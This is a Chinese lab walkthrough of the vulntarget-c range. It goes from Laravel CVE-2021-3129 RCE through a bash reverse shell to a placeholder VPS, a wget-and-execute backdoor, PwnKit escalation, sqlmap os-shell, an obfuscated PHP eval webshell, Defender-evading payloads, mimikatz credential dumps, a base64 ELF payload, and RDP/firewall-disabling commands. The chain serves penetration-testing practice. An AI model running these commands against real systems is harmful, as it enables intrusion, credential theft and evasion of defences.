Acczdy
Acczdy

【vulntarget】系列:vulntarget-c 练习WP

本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试

一、靶场信息:

下载地址:

百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 
提取码:1p9p

**拓扑图:**IP信息根据本地搭建环境自行配置改变,Ubuntu20需要更改静态IP
【vulntarget】系列:vulntarget-c 练习WP_第1张图片
官方WP:vulntarget漏洞靶场系列(三)— vulntarget-c

二、使用到的工具、漏洞或技术:

工具:
Viper、nmap、蚁剑、掩日、Sqlmap
漏洞或技术:
CVE-2021-3129、SQL注入、隧道代理、免杀

三、步骤:

  1. 通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.0.107,直接扫描靶机IP信息

【vulntarget】系列:vulntarget-c 练习WP_第2张图片

  1. 访问目标的80端口,为Laravel,此处存在:CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞

【vulntarget】系列:vulntarget-c 练习WP_第3张图片

  1. 获取漏洞利用EXP,执行命令 whoami ,命令执行成功:

【vulntarget】系列:vulntarget-c 练习WP_第4张图片

  1. 可一执行命令,此时可以通过命令执行漏洞执行反弹shell命令,如下:

【vulntarget】系列:vulntarget-c 练习WP_第5张图片
VPS 开启监听:nc -lvnp 7000
【vulntarget】系列:vulntarget-c 练习WP_第6张图片
反弹shell命令:/bin/bash -i >& /dev/tcp/VPS_IP/7000 0>&1 ,进行编码: echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xMDMvNzAwMCAwPiYx|base64 -d|bash -i
【vulntarget】系列:vulntarget-c 练习WP_第7张图片
执行编码后的命令:
【vulntarget】系列:vulntarget-c 练习WP_第8张图片

  1. 查看VPS,成功接收到反弹Shell:

【vulntarget】系列:vulntarget-c 练习WP_第9张图片

  1. 在这个Shell中操作不太方便,在此处将MSF生成的后门程序上传进去执行,上传有多种方法,随便都可以:
  2. Viper开启监听,并生成elf文件:

【vulntarget】系列:vulntarget-c 练习WP_第10张图片
【vulntarget】系列:vulntarget-c 练习WP_第11张图片

  1. 将elf文件通过此处上传到Viper中,方便不用再开http服务,此处要将elf下载到Ubuntu靶机中:

【vulntarget】系列:vulntarget-c 练习WP_第12张图片
点击右侧【一句话下载】,获取Linux下载执行一句话
wget -O Ubuntu20.elf --no-check-certificate https://x.x.x.x:x/api/v1/d/?en=%2BG9yQgDfl023HFg7lQtW4A%3D%3D && chmod 755 Ubuntu20.elf && ./Ubuntu20.elf
【vulntarget】系列:vulntarget-c 练习WP_第13张图片

  1. 在反弹Shell中执行:

【vulntarget】系列:vulntarget-c 练习WP_第14张图片

  1. 返回Viper查看,已成功上线:

【vulntarget】系列:vulntarget-c 练习WP_第15张图片

  1. 进入session,查找可提权模块,此处使用: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 提权:
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.0.107 - Collecting local exploits for x64/linux...

[*] 192.168.0.107 - 187 exploit checks are being tried...
[+] 192.168.0.107 - exploit/linux/local/cve_2021_3493_overlayfs: The target appears to be vulnerable.
[+] 192.168.0.107 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.0.107 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 192.168.0.107 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.0.107 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 192.168.0.107 - exploit/linux/local/sudo_baron_samedit: The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[+] 192.168.0.107 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1.2 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 63 / 63
[*] 192.168.0.107 - Valid modules for session 1:
============================

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_3493_overlayfs                         Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 5   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 6   exploit/linux/local/sudo_baron_samedit                              Yes                      The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
 7   exploit/linux/local/sudoedit_bypass_priv_esc                        Yes                      The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1.2 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module

meterpreter > meterpreter > bg
[*] Backgrounding session 1...
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > optiosn
[-] unknown command: optiosn
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.102    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1112
LPORT => 1112
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.0.102:1112 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dybqvsxhnip
[+] The target is vulnerable.
[*] Writing '/tmp/.rnshlalix/pbeiyxhw/pbeiyxhw.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.rnshlalix
[*] Sending stage (3016644 bytes) to 192.168.0.107
[+] Deleted /tmp/.rnshlalix/pbeiyxhw/pbeiyxhw.so
[+] Deleted /tmp/.rnshlalix/.uinqvicbcvds
[*] Meterpreter session 2 opened (192.168.0.102:1112 -> 192.168.0.107:41970) at 2023-06-29 14:43:18 +0000

meterpreter >

【vulntarget】系列:vulntarget-c 练习WP_第16张图片

  1. 添加路由,开启socks代理,进行内网探测:

【vulntarget】系列:vulntarget-c 练习WP_第17张图片
【vulntarget】系列:vulntarget-c 练习WP_第18张图片

  1. kali配置代理,扫描内网IP段: 10.0.20.1/24 ,发现 10.0.20.100:80 端口开放:

proxychains4 nmap -Pn -sT 10.0.20.1/24 -p80 -v
【vulntarget】系列:vulntarget-c 练习WP_第19张图片

  1. 访问 10.0.20.100:80 ,是一个CMS:

【vulntarget】系列:vulntarget-c 练习WP_第20张图片

  1. BurpSuite配置好socks代理,进行抓包,爆破后台密码,获得密码: admin123

【vulntarget】系列:vulntarget-c 练习WP_第21张图片
【vulntarget】系列:vulntarget-c 练习WP_第22张图片

  1. 后台查找可能存在的注入点,发送到sqlmap跑注入:

【vulntarget】系列:vulntarget-c 练习WP_第23张图片

  1. 将数据包保存到1.txt,使用sql获取Shell:

python sqlmap.py -r 1.txt --proxy=socks5://192.168.0.103:1113 --os-shell
【vulntarget】系列:vulntarget-c 练习WP_第24张图片
【vulntarget】系列:vulntarget-c 练习WP_第25张图片

  1. 写入一句话木马(文件名不要用shell.php),蚁剑开启代理连接:

echo ^<^?php class G24qO61o { public function __construct($H8uJD){ @eval("/*Z1007V0U75*/".$H8uJD.""); }}new G24qO61o($_REQUEST['1']);?^>^ > test.php
【vulntarget】系列:vulntarget-c 练习WP_第26张图片
【vulntarget】系列:vulntarget-c 练习WP_第27张图片

  1. Viper生成转发上线后门程序,上传到 10.0.20.100 机器中,生成的后门程序需要过 Windows Defender:

【vulntarget】系列:vulntarget-c 练习WP_第28张图片
查看进程:
【vulntarget】系列:vulntarget-c 练习WP_第29张图片
存在 Windows Defender:
【vulntarget】系列:vulntarget-c 练习WP_第30张图片

  1. 使用 掩日 生成免杀后门程序:

生成 .c 文件:
【vulntarget】系列:vulntarget-c 练习WP_第31张图片
掩日加载 win2016.c :
【vulntarget】系列:vulntarget-c 练习WP_第32张图片
将生成的 exe 和 txt 上传:
【vulntarget】系列:vulntarget-c 练习WP_第33张图片
【vulntarget】系列:vulntarget-c 练习WP_第34张图片

  1. 后门程序存在,没有被杀,执行 z5v.exe z5v.txt ,Viper查看上线:

【vulntarget】系列:vulntarget-c 练习WP_第35张图片

  1. 加载kiwi模块,获取密码信息,解密 Administrator 账号的 NTLM 值,获得明文密码 Admin#123
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-JJJBQ4N87RA  dfc8d2bfa540a0a6e2248a82322e654e  cfa10f59337120a5ea6882b11c1c9f451f5f4ea6

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-JJJBQ4N87RA  (null)
WIN-JJJBQ4N87RA$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-JJJBQ4N87RA  (null)
win-jjjbq4n87ra$  WORKGROUP        (null)


meterpreter >

【vulntarget】系列:vulntarget-c 练习WP_第36张图片
【vulntarget】系列:vulntarget-c 练习WP_第37张图片

  1. Viper添加路由,并通过Shell开启远程桌面登录:

【vulntarget】系列:vulntarget-c 练习WP_第38张图片
开启远程桌面登录:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

【vulntarget】系列:vulntarget-c 练习WP_第39张图片

  1. 配置Proxifier代理,进行远程桌面登录:

【vulntarget】系列:vulntarget-c 练习WP_第40张图片
【vulntarget】系列:vulntarget-c 练习WP_第41张图片

  1. 使用远程登录工具,尝试输入 Admin#123 成功打开,发现有SSH连接信息:

【vulntarget】系列:vulntarget-c 练习WP_第42张图片
【vulntarget】系列:vulntarget-c 练习WP_第43张图片

  1. Viper配置监听,需要让 Ubuntu16 上线到Viper,生成 .elf 文件,此处要注意,生成的 .elf 直接传到Windows中会被杀,需要通过base64编码写入到服务器中:

【vulntarget】系列:vulntarget-c 练习WP_第44张图片
【vulntarget】系列:vulntarget-c 练习WP_第45张图片
将 Ubuntu.elf 进行 base64 编码:
【vulntarget】系列:vulntarget-c 练习WP_第46张图片

  1. 通过 echo 将编码解码写入到 Ubuntu.elf ,添加执行权限,执行:
vulntarget@ubuntu:~$ cd /tmp
vulntarget@ubuntu:/tmp$ echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAEXAoACotRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==|base64 -d > Ubuntu.elf
vulntarget@ubuntu:/tmp$ ls
systemd-private-bcf79bc55b5f4a59b549efca5a9bd29a-systemd-timesyncd.service-ZP88RJ
Ubuntu.elf
vmware-root
vulntarget@ubuntu:/tmp$ chmod +x Ubuntu.elf
vulntarget@ubuntu:/tmp$ ./Ubuntu.elf

【vulntarget】系列:vulntarget-c 练习WP_第47张图片

  1. 返回Viper查看,没有上线,没事,是因为忘了防火墙放开 1116 端口,可以直接关闭防火墙,或者开放 1116 端口:
netsh advfirewall set allprofiles state off			#关闭防火墙

【vulntarget】系列:vulntarget-c 练习WP_第48张图片

  1. 对 Ubuntu16 提权,此处通过搜索提权模块,使用 exploit/linux/local/cve_2021_3493_overlayfs 提权:

【vulntarget】系列:vulntarget-c 练习WP_第49张图片

  1. 完整链路图:

【vulntarget】系列:vulntarget-c 练习WP_第50张图片
【vulntarget】系列:vulntarget-c 练习WP_第51张图片

靶场WP持续更新……

你可能感兴趣的:(靶场记录,java,网络安全,安全)

  • 【计算机网络】host文件 酱学编程 计算机网络计算机网络
    host文件的主要功能:域名解析本地映射:host文件的主要功能是将**域名映射到相应的IP地址**。当计算机需要访问一个网站或服务时,它会首先在host文件中查找该域名对应的IP地址。如果在host文件中找到了匹配的域名和IP地址映射,计算机将直接使用该映射,而不会向DNS(域名系统)服务器查询。例如,如果你在host文件中添加了一条记录:127.0.0.1example.com,那么当你在浏览
  • 使用.NET 8构建高效的时间日期帮助类 黄同学real C#后端开发.net.netc#后端
    使用.NET8构建高效的时间日期帮助类在现代Web应用程序中,处理日期和时间是一个常见的需求。无论是记录日志、生成报告还是进行数据分析,正确处理日期和时间对于确保数据的准确性和一致性至关重要。本文将详细介绍如何使用ASP.NETCore和C#构建一个高效的时间日期帮助类,并展示其使用方法。技术栈.NET8:提供强大的API开发框架。C#:用于编写高效的业务逻辑。代码实现DateTimeHelper
  • Dubbo 支持分布式事务吗?思维导图 代码示例(java 架构) 用心去追梦 dubbo分布式java
    Dubbo本身并不直接提供分布式事务的支持,但可以通过集成其他分布式事务解决方案来实现。常见的分布式事务管理方案包括TCC(Try-Confirm-Cancel)、Saga、XA和基于消息的事务等。在Dubbo应用中,最常用的分布式事务框架之一是Seata(以前称为Fescar),它提供了对多种分布式事务模式的支持。思维导图概述Dubbo分布式事务概念分布式系统中确保多个服务之间的操作要么全部成功
  • 第 1 章 服务架构演进史 沉登c 凤凰架构架构
    1.1原始分布式时代调用远程方法面临的问题与解决方案:远程的服务在哪里——服务发现有多少个——负载均衡网络出现分区、超时或服务出错怎么办——熔断、隔离、降级方法的参数与返回结果如何表示——序列化协议信息如何传输——传输协议服务权限如何管理——认证、授权如何保证通信安全——网络安全如何令调用不同机器的服务返回相同的结果——分布式数据一致性1.2单体系统时代单体架构:系统中主要的过程调用都是进程内的,
  • javax.validation.constraints.NotNull找不到 大叔是90后大叔 springbootJavajavaspringboot
    javax.validation.constraints.NotNull找不到javax.validation.constraints.NotNull找不到使用范例附录javax.validation.constraints.NotNull找不到解决方案:需要在pom.xml中引入依赖org.springframework.bootspring-boot-starter-validation使用范
  • ActiveMQ与RabbitMQ的区别 BE东欲 java-rabbitmqrabbitmqjava-activemqactivemqjava
    ActiveMQ和RabbitMQ都是流行的消息队列中间件,它们之间有以下几点区别:编写语言:ActiveMQ是用Java编写的,而RabbitMQ则是用Erlang编写的。协议支持:ActiveMQ支持OpenWire、Stomp、AMQP、MQTT等多种协议,而RabbitMQ主要支持AMQP协议。性能:RabbitMQ在处理大量消息时的性能表现比ActiveMQ更好。持久化:ActiveMQ
  • 1Panel服务器运维管理面板 安星辰 综合web运维服务器
    1Panel是一个现代化、开源的Linux服务器运维管理面板,类似于宝塔1产品优势¶快速建站:深度集成Wordpress和Halo,域名绑定、SSL证书配置等一键搞定;高效管理:通过Web端轻松管理Linux服务器,包括应用管理、主机监控、文件管理、数据库管理、容器管理等;安全可靠:最小漏洞暴露面,提供防火墙和安全审计等功能;一键备份:支持一键备份和恢复,备份数据云端存储,永不丢失。在线安装:1环
  • 【gopher的java学习笔记】代码分层之controller和service ThisIsClark gopher的java学习笔记java学习笔记
    在Java的Web开发中,Controller层和Service层是两个至关重要的层次,它们各自承担着不同的职责,共同协作以实现复杂的应用程序功能。本文将详细介绍Java中Controller层和Service层的技术特点和作用。一、Controller层(控制层)Controller层是应用程序的入口点,负责接收用户的请求并处理。它通常处理来自前端或客户端的请求,并将请求转发给相应的Servic
  • 记服务器遭遇ssh攻击及应对过程 sunhao06 建站服务器ssh安全
    前几天登录服务器一看,短短十几个小时的时间有七千多次ssh错误登录记录,毫无疑问,有人在对我进行ssh远程暴库攻击。利用命令grep-o'[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'/var/log/secure|sort|uniq-c可以看到每个ip的访问次数(其实图没截完,还有很多),可以看到这个人应该有很多“肉鸡”来对别人进行
  • 楼顶红灯的作用 爱吃瓜的猹z 物联网
    现代建筑楼顶装红灯的主要目的是为了确保航空安全。1.航空安全红灯的作用:楼顶的红灯(有时称为障碍灯)主要用于警示飞行器(如飞机或直升机)在夜间或能见度低的条件下,远离建筑物。这些灯光有助于减少低飞飞行器与建筑物的碰撞风险。2.闪烁频率的不一致不同频率的原因:视觉效果:不同的闪烁频率和模式可以增加灯光的可见性,确保其在不同的天气条件和视觉背景下更加显眼。减少视觉疲劳:如果所有建筑的灯光频率完全一致,
  • synchronized和Lock的区别 codeBrute java
    synchronized和Lock是Java中用于实现线程同步的两种机制,它们之间存在显著的差异。以下是关于synchronized和Lock区别的详细分析:synchronizedLock定义与类型Java中的一个关键字,用于实现线程同步Java中的一个接口,提供了比synchronized更灵活的锁机制,常用实现类有ReentrantLock等加锁方式隐式加锁,无需显式地获取和释放锁显式加锁,
  • vite build报错 Unexpected token (Note that you need plugins to import files that are not JavaScript) 实践是最好的老师 vuejavascript前端vue.js
    原因是我在console.log语句想打印出环境变量console.log(‘import.meta.env.MODE’,import.meta.env.MODE)删除上面console.log语句就能正常打包了,并下面语句能正常打包和运行constconfig:any={dev:{baseUrl:‘http://baiduTest.com’//测试接口域名},master:{baseUrl:‘h
  • 【Spring】Spring 解决循环依赖的 3 种方式 九师兄 bootspringjava后端
    原文:http://www.javastack.cn/article/2020/spring-cycle-depends-on-three-ways/循环依赖就是N个类中循环嵌套引用,如果在日常开发中我们用new对象的方式发生这种循环依赖的话程序会在运行时一直循环调用,直至内存溢出报错。下面说一下Spring是如果解决循环依赖的。第一种:构造器参数循环依赖Spring容器会将每一个正在创建的Bea
  • Java Web基础——Controller+Service +Dao三层的功能划分 Low level coder java前端数据库
    1.Controller/Service/DAO简介:Controller是管理业务(Service)调度和管理跳转的。Service是管理具体的功能的。Controller只负责管理,而Service负责实施。DAO只完成增删改查,虽然可以1-n,n-n,1-1关联,模糊、动态、子查询都可以。但是无论多么复杂的查询,dao只是封装增删改查。至于增删查改如何去实现一个功能,dao是不管的。总结这三
  • JavaWeb——MySQL-多表设计(3/5):(一对一关系,多对多关系,小结) qiyi.sky JavaWebmysql数据库笔记学习java
    目录一对一关系剖析一对一关系场景与特点数据库实现方式图形化工具演示与验证多对多关系解析多对多关系实例与困境中间表解决方案工具演示与理解深化多表关系核心要点回顾一对一关系剖析一对一关系场景与特点以用户与身份证为例,呈现一对一典型场景。在业务系统中,为优化数据操作效率,常拆分含多种信息的大表。如用户表含基本与身份信息,若基本信息查询频繁、身份信息查询低频,可拆为用户基本信息表(含用户ID、姓名、性别等
  • ASP.NET Core Blazor编程系列: 使用JWT进行身份验证 沉静湖面 asp.net后端.NET
    在ASP.NETCoreBlazor应用程序中实现身份验证是一个常见的需求。JSONWebToken(JWT)是一种流行的身份验证机制,它可以在客户端和服务器之间安全地传输信息。本文将介绍如何在ASP.NETCoreBlazor应用程序中使用JWT进行身份验证。什么是JWT?JSONWebToken(JWT)是一种开放标准(RFC7519),它定义了一种紧凑且自包含的方式来安全地在各方之间传输信息
  • Vue2:父子组件间参数传递 - 单项传递和双向绑定 我是飞鸟呀 Vue前端javascript开发语言
    1、单向传递:在之前的经验中,数据通常都是从父组件通过prop单项传递给子组件,供子组件使用,但是并不修改。2、双向传递2.1子组件修改后通过事件触发传递给父组件在Vue2踩坑记录:父子间参数传递,不要尝试修改计算属性,可能无法实现响应式一文中,父组件通过prop传递给子组件,子组件接收后拷贝一份,在子组件内部修改,修改完成后,通过$emit事件触发,再将修改后的数据传递给父组件使用;2.2通过.
  • centos安装1Panel管理面板 l1677516854 系统搭建centoslinux运维
    简介1Panel是一个现代化、开源的Linux服务器运维管理面板。高效管理:用户可以通过Web图形界面轻松管理Linux服务器,实现主机监控、文件管理、数据库管理、容器管理等功能;快速建站:深度集成开源建站软件WordPress和Halo,域名绑定、SSL证书配置等操作一键搞定;应用商店:精选上架各类高质量的开源工具和应用软件,协助用户轻松安装并升级;安全可靠:基于容器管理并部署应用,实现最小的漏
  • 深入浅出讲解JavaWeb后端的三层架构:Controller、Service、DAO 以及详解结合MyBatis和XML映射的DAO层设计 给我吃茄子 Java后端开发三层架构MyBatis架构java后端springmybatisxmlintellij-idea
    目录1.控制层(Controller)(1)职责及作用(2)实现(3)总结2.服务层(Service)(1)职责与作用(2)实现(3)总结3.数据访问层(DAO)(1)职责及作用(2)实现(3)总结4.各层之间的关系5.三层架构的优势6.实际项目中的应用7.总结——三层架构1.MyBatis简介2.DAO层职责回顾3.DAO层结合MyBatis和XML映射的设计(1)项目结构(2)创建实体类(3)
  • K8S中数据存储之配置存储 元气满满的热码式 kubernetes容器云原生
    配置存储在Kubernetes中,ConfigMap和Secret是两种核心资源,用于存储和管理应用程序的配置数据和敏感信息。理解它们的功能和最佳实践对于提高Kubernetes应用程序的安全性和配置管理的效率至关重要。ConfigMapConfigMap是一种API对象,允许你存储非敏感配置数据,如环境变量、数据库URL等。它以键值对的形式存储数据,便于应用程序访问必要的配置。ConfigMap
  • 如何使用 Linux 构建自己的 NAS 系统? wljslmz Linux技术linux运维服务器NAS
    构建一个网络附加存储(NetworkAttachedStorage,NAS)系统是一个非常有用的项目,尤其是对于家庭和小型办公室用户来说。通过使用Linux构建自己的NAS系统,你可以享受到灵活性、安全性和定制化的优势。本文将详细介绍如何使用Linux构建自己的NAS系统,从硬件选择、系统安装、软件配置到日常维护。硬件选择要构建一个NAS系统,你需要以下硬件:主机(服务器):这可以是一台专用的服务
  • 石化!电力!消防!煤矿!新能源!交通!等工业安全领域 无锡布里渊 分布式光纤测温厘米级温度监测实时监测线型感温
    如果你是石化、电力、消防、煤矿、新能源、交通等工业安全领域,请一定不要划走,有一项新的技术正在这些领域快速应用增长,可以抽2分钟了解学习一下新的技术。通过使用通信光纤作为传感器,可以将长达50km的通信光纤变成几百万个带定位功能的温度、声波振动、位移应变传感器。当50km通信光纤与长达50km的石化管道同沟敷设的情况下,任何位置点的泄漏、地质灾害、人力破坏都将一目了然。当一栋楼宇中,每个房间都有光
  • python templist什么意思_聊聊python中的list——基本操作 门捷列夫斯基 pythontemplist什么意思
    在学习数据结构的时候,从老师和同学口中得知了python中用于实现线性表的list(列表)。在查阅相关资料后,感觉这真是一个有趣又好用的数据结构。于是打算写几篇博客,加深对list原理和使用方法的理解。先来讲讲list的定义和基本用法吧~定义:列表是由一系列按特定顺序排列的元素组成。此时表中的元素不再像c,cpp,java一样只能是同一类型,而是可以根据自己的需求,添加任意类型的元素(数,字符串,
  • NAS 网络附加存储 (配置与访问简述) 木合杉 服务器及相关产品网络功能测试服务器
    无门槛群晖NAS搭建指南-少数派4年NAS使用经验,万字带你从小白变身高端玩家,群晖DS920+保姆级教程-少数派目录基本概念核心功能存储技术系统与操作应用与扩展性数据保护安全性适用场景成本效益选择与购买NAS服务器配置与使用硬件安装初始化设置系统安装与更新存储配置文件系统与共享用户账户管理远程访问设置安全设置应用安装与使用维护与监控性能优化技术支持以群晖(Synology)为例硬件安装初始化设置
  • CSP Content Security Policy(内容安全策略) 睡不着的可乐 前端web安全
    CSPContentSecurityPolicy(内容安全策略)CSP前端中的CSP指的是ContentSecurityPolicy(内容安全策略),是一种用于提升网站安全性的浏览器功能。CSP主要用于防止XSS(跨站脚本攻击)和数据注入攻击,通过限制网页中的内容来源(如脚本、样式、图像、媒体等)来降低被恶意代码利用的风险。CSP在前端的作用CSP可以通过HTTP响应头或标签来定义安全策略,规定前
  • Web安全漏洞——SSTI模版注入(初级) @Camelus 渗透与攻防web安全网络安全安全安全架构
    目录前言:(一)什么是SSTI举个栗子:前提:自动化工具:(二)Flask模块注入0x01常用的内建属性__class___base____bases____mro____subclasses__()__dict____init____global____getitem__过滤器0x01attr0x02format0x03firstlastrandom0x04join0x05lower0x06re
  • 阿里二面准备(Java 研发),精心准备200题(含答案)收割 offer 跟着我学Java 面试程序员Javajava面试开发语言后端Java开发
    这篇文章我花了两天编辑,是目前我能找到的几乎所有的问题。所以你们如果能全部掌握,基本就能收割offer了。时间有限的话,针对自己的情况优先选最有可能被问到的问题来准备。文中的200道题大部分都包含了答案,希望对要参加面试的读者有一定的帮助,这是小编为了准备面试阿里二面所准备的面试题,出来收集了200道高级Java面试题之外,小编同时整理的Java核心笔记,Java架构面试专题整合200道(pdf文
  • 汽车网络安全--ISO\SAE 21434解析(二) CyberSecurity_zhang 汽车信息安全汽车网络安全ISO\SAE21434TARA
    1.风险评估方法书接上文,我们正式开始对车灯系统的TARA分析,首先回顾下整车关于车灯系统描述:可以比较肯定的是,我们定义的item为车灯系统,因此可以看到上图中画出了itemboundary;同时定义出运行环境,个人理解,这块就是为TARA分析提供足够的环境支撑,不管是直接还是间接与车灯系统有关系的,都需要列举出来。有了上述基本概念,我们接着回顾TARA分析方法的八股文:资产定义->相应破坏场景
  • 几个适合Java开发者的免费IDEA插件 java后端
    今天,给大家推荐几个好用且免费的IntelliJIDEA插件。如果你还没有用过,可以尝试一下,也许对你的日常工作会有一定的效率提升噢!RestFulTool如果你是一个RESTful服务的开发者,那么这个一定要试一下。它是一套非常丰富的RESTful服务开发工具,对SpringMVC和SpringBoot支持也是非常友好,开发者可以直接通过插件找到自己编写的RESTful接口:同时也能非常方便的进
  • 备份与恢复管理系统深度解析及代码实践 我的运维人生 服务器linux运维运维开发技术共享
    备份与恢复管理系统深度解析及代码实践在现代数据驱动的世界中,数据备份与恢复管理系统的重要性不言而喻。无论是面对硬件故障、软件崩溃、自然灾害还是人为误操作,有效的备份与恢复策略都是企业保障数据安全、减少业务中断风险的关键。本文将深入探讨备份与恢复的基本概念、类型、策略,并结合代码示例展示实际操作。一、备份与恢复的基本概念备份是指按照预定的规则,周期性地将业务数据制作成一份或多份拷贝,并存放于专门的备
  • HttpClient 4.3与4.3版本以下版本比较 spjich javahttpclient
    网上利用java发送http请求的代码很多,一搜一大把,有的利用的是java.net.*下的HttpURLConnection,有的用httpclient,而且发送的代码也分门别类。今天我们主要来说的是利用httpclient发送请求。 httpclient又可分为 httpclient3.x httpclient4.x到httpclient4.3以下 httpclient4.3
  • Essential Studio Enterprise Edition 2015 v1新功能体验 Axiba .net
    概述:Essential Studio已全线升级至2015 v1版本了!新版本为JavaScript和ASP.NET MVC添加了新的文件资源管理器控件,还有其他一些控件功能升级,精彩不容错过,让我们一起来看看吧! syncfusion公司是世界领先的Windows开发组件提供商,该公司正式对外发布Essential Studio Enterprise Edition 2015 v1版本。新版本
  • [宇宙与天文]微波背景辐射值与地球温度 comsci 背景
            宇宙这个庞大,无边无际的空间是否存在某种确定的,变化的温度呢?      如果宇宙微波背景辐射值是表示宇宙空间温度的参数之一,那么测量这些数值,并观测周围的恒星能量输出值,我们是否获得地球的长期气候变化的情况呢?   &nbs
  • lvs-server 男人50 server
    #!/bin/bash # # LVS script for VS/DR # #./etc/rc.d/init.d/functions # VIP=10.10.6.252 RIP1=10.10.6.101 RIP2=10.10.6.13 PORT=80 case $1 in start)   /sbin/ifconfig eth2:0 $VIP broadca
  • java的WebCollector爬虫框架 oloz 爬虫
    WebCollector主页: https://github.com/CrawlScript/WebCollector 下载:webcollector-版本号-bin.zip将解压后文件夹中的所有jar包添加到工程既可。 接下来看demo package org.spider.myspider; import cn.edu.hfut.dmic.webcollector.cra
  • jQuery append 与 after 的区别 小猪猪08
    1、after函数 定义和用法: after() 方法在被选元素后插入指定的内容。 语法: $(selector).after(content) 实例: <html> <head> <script type="text/javascript" src="/jquery/jquery.js"></scr
  • mysql知识充电 香水浓 mysql
    索引 索引是在存储引擎中实现的,因此每种存储引擎的索引都不一定完全相同,并且每种存储引擎也不一定支持所有索引类型。 根据存储引擎定义每个表的最大索引数和最大索引长度。所有存储引擎支持每个表至少16个索引,总索引长度至少为256字节。 大多数存储引擎有更高的限制。MYSQL中索引的存储类型有两种:BTREE和HASH,具体和表的存储引擎相关; MYISAM和InnoDB存储引擎
  • 我的架构经验系列文章索引 agevs 架构
